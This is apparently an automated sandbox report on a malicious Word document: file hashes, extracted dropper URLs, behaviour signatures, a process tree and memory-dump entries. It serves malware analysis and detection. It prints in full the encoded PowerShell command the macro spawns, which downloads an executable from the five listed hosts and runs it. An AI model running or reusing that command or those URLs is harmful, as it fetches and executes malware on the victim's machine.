Analysis

  • max time kernel
    104s
  • max time network
    75s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    20-05-2022 22:04

General

  • Target

    sample.doc

  • Size

    168KB

  • MD5

    f241767e3a8ffa9df6a968c7bea97413

  • SHA1

    46fe2b8b04c24fdd66eb0efc345e3f0b159ccbc5

  • SHA256

    e984d53b336dd818e3eef16a2f8bf04eea19d132b7a1f1c82aff3cd7d1fcd01d

  • SHA512

    3b79cf3ba84efd17c406a8c8ea6d774d5189737cde9dfc9abf615827052d2b9312f78a1717ea2de304f9425c344292fc11d20b4828e1da14fc5c085ebeb8cb4e

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://manandvanwaterlooville.co.uk/wp-admin/prX892/

exe.dropper

https://uniral.com/captchasignup/4J579681/

exe.dropper

https://scyzm.net/lkx7/lqoH8S/

exe.dropper

https://amagna.nl/DZ9MzAobu3/37Z/

exe.dropper

https://nilinkeji.com/online/90fb31/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\sample.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:916
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1364
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
      powersheLL -e JABWAEEARgBHAEsAaQBqAGMAPQAnAEoAQwBNAEQATQBiAHgAYQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBgAEMAdQBSAGkAVABZAFAAUgBPAFQAYABvAGMAbwBMACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAQQBXAEUAVgBSAGYAaQBzACAAPQAgACcANAAzADIAJwA7ACQAUQBNAFgAVQBNAHQAcQB4AD0AJwBIAFgAVwBTAFEAcABjAGwAJwA7ACQATABaAEYASQBYAGgAdQB2AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABBAFcARQBWAFIAZgBpAHMAKwAnAC4AZQB4AGUAJwA7ACQARQBQAFcAWgBWAGMAbAB0AD0AJwBXAEoAQwBZAFIAdQB5AGMAJwA7ACQARABVAEMASwBOAG8AbABsAD0ALgAoACcAbgAnACsAJwBlAHcALQBvAGIAagBlACcAKwAnAGMAdAAnACkAIABuAGUAVAAuAFcAZQBiAEMATABJAGUATgBUADsAJABZAEoARgBQAEkAcwByAHUAPQAnAGgAdAB0AHAAOgAvAC8AbQBhAG4AYQBuAGQAdgBhAG4AdwBhAHQAZQByAGwAbwBvAHYAaQBsAGwAZQAuAGMAbwAuAHUAawAvAHcAcAAtAGEAZABtAGkAbgAvAHAAcgBYADgAOQAyAC8AKgBoAHQAdABwAHMAOgAvAC8AdQBuAGkAcgBhAGwALgBjAG8AbQAvAGMAYQBwAHQAYwBoAGEAcwBpAGcAbgB1AHAALwA0AEoANQA3ADkANgA4ADEALwAqAGgAdAB0AHAAcwA6AC8ALwBzAGMAeQB6AG0ALgBuAGUAdAAvAGwAawB4ADcALwBsAHEAbwBIADgAUwAvACoAaAB0AHQAcABzADoALwAvAGEAbQBhAGcAbgBhAC4AbgBsAC8ARABaADkATQB6AEEAbwBiAHUAMwAvADMANwBaAC8AKgBoAHQAdABwAHMAOgAvAC8AbgBpAGwAaQBuAGsAZQBqAGkALgBjAG8AbQAvAG8AbgBsAGkAbgBlAC8AOQAwAGYAYgAzADEALwAnAC4AIgBTAGAAcABsAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFgARwBTAE0AVQBsAGEAdQA9ACcATgBKAFcATwBLAHEAbAB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABEAE8AQgBCAEkAeQB5AG0AIABpAG4AIAAkAFkASgBGAFAASQBzAHIAdQApAHsAdAByAHkAewAkAEQAVQBDAEsATgBvAGwAbAAuACIAZABvAHcAYABOAGwATwBhAEQAYABGAEkAbABFACIAKAAkAEQATwBCAEIASQB5AHkAbQAsACAAJABMAFoARgBJAFgAaAB1AHYAKQA7ACQATgBRAFIAVgBKAHQAaAB0AD0AJwBHAEoARwBCAFUAbgBzAGUAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABMAFoARgBJAFgAaAB1AHYAKQAuACIATABgAGUAbgBgAEcAVABIACIAIAAtAGcAZQAgADIANAAwADUANAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwByAEUAYABBAFQARQAiACgAJABMAFoARgBJAFgAaAB1AHYAKQA7ACQAUwBWAEwAWgBBAHYAeQBrAD0AJwBJAFoATQBNAFYAeQBrAGwAJwA7AGIAcgBlAGEAawA7ACQAQwBXAFoARgBBAHgAdABsAD0AJwBMAE8ASQBXAEcAbABzAGQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQwBSAFEAWgBLAGoAcgBsAD0AJwBUAFcASwBEAEoAYwBtAGIAJwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:944

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/916-71-0x00000000004D3000-0x00000000004D7000-memory.dmp
      Filesize

      16KB

    • memory/916-61-0x00000000004D3000-0x00000000004D7000-memory.dmp
      Filesize

      16KB

    • memory/916-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/916-57-0x0000000075711000-0x0000000075713000-memory.dmp
      Filesize

      8KB

    • memory/916-54-0x00000000721D1000-0x00000000721D4000-memory.dmp
      Filesize

      12KB

    • memory/916-59-0x00000000004D3000-0x00000000004D7000-memory.dmp
      Filesize

      16KB

    • memory/916-60-0x00000000004D3000-0x00000000004D7000-memory.dmp
      Filesize

      16KB

    • memory/916-70-0x00000000004D3000-0x00000000004D7000-memory.dmp
      Filesize

      16KB

    • memory/916-62-0x00000000004D3000-0x00000000004D7000-memory.dmp
      Filesize

      16KB

    • memory/916-69-0x00000000004D3000-0x00000000004D7000-memory.dmp
      Filesize

      16KB

    • memory/916-64-0x00000000004D3000-0x00000000004D7000-memory.dmp
      Filesize

      16KB

    • memory/916-65-0x00000000004D3000-0x00000000004D7000-memory.dmp
      Filesize

      16KB

    • memory/916-66-0x00000000004D3000-0x00000000004D7000-memory.dmp
      Filesize

      16KB

    • memory/916-67-0x00000000004D3000-0x00000000004D7000-memory.dmp
      Filesize

      16KB

    • memory/916-68-0x00000000004D3000-0x00000000004D7000-memory.dmp
      Filesize

      16KB

    • memory/916-72-0x00000000004D3000-0x00000000004D7000-memory.dmp
      Filesize

      16KB

    • memory/916-58-0x0000000070C3D000-0x0000000070C48000-memory.dmp
      Filesize

      44KB

    • memory/916-55-0x000000006FC51000-0x000000006FC53000-memory.dmp
      Filesize

      8KB

    • memory/916-63-0x00000000004D3000-0x00000000004D7000-memory.dmp
      Filesize

      16KB

    • memory/916-74-0x00000000004D3000-0x00000000004D7000-memory.dmp
      Filesize

      16KB

    • memory/916-73-0x00000000004D3000-0x00000000004D7000-memory.dmp
      Filesize

      16KB

    • memory/916-76-0x00000000004D3000-0x00000000004D7000-memory.dmp
      Filesize

      16KB

    • memory/916-75-0x00000000004D3000-0x00000000004D7000-memory.dmp
      Filesize

      16KB

    • memory/916-77-0x00000000004D3000-0x00000000004D7000-memory.dmp
      Filesize

      16KB

    • memory/916-79-0x00000000004D3000-0x00000000004D7000-memory.dmp
      Filesize

      16KB

    • memory/916-78-0x00000000004D3000-0x00000000004D7000-memory.dmp
      Filesize

      16KB

    • memory/916-80-0x00000000004D3000-0x00000000004D7000-memory.dmp
      Filesize

      16KB

    • memory/916-88-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/944-83-0x0000000002364000-0x0000000002367000-memory.dmp
      Filesize

      12KB

    • memory/944-82-0x000007FEF3200000-0x000007FEF3D5D000-memory.dmp
      Filesize

      11.4MB

    • memory/944-84-0x000000001B750000-0x000000001BA4F000-memory.dmp
      Filesize

      3.0MB

    • memory/944-85-0x000000000236B000-0x000000000238A000-memory.dmp
      Filesize

      124KB

    • memory/944-81-0x000007FEFB6E1000-0x000007FEFB6E3000-memory.dmp
      Filesize

      8KB

    • memory/1364-86-0x0000000000000000-mapping.dmp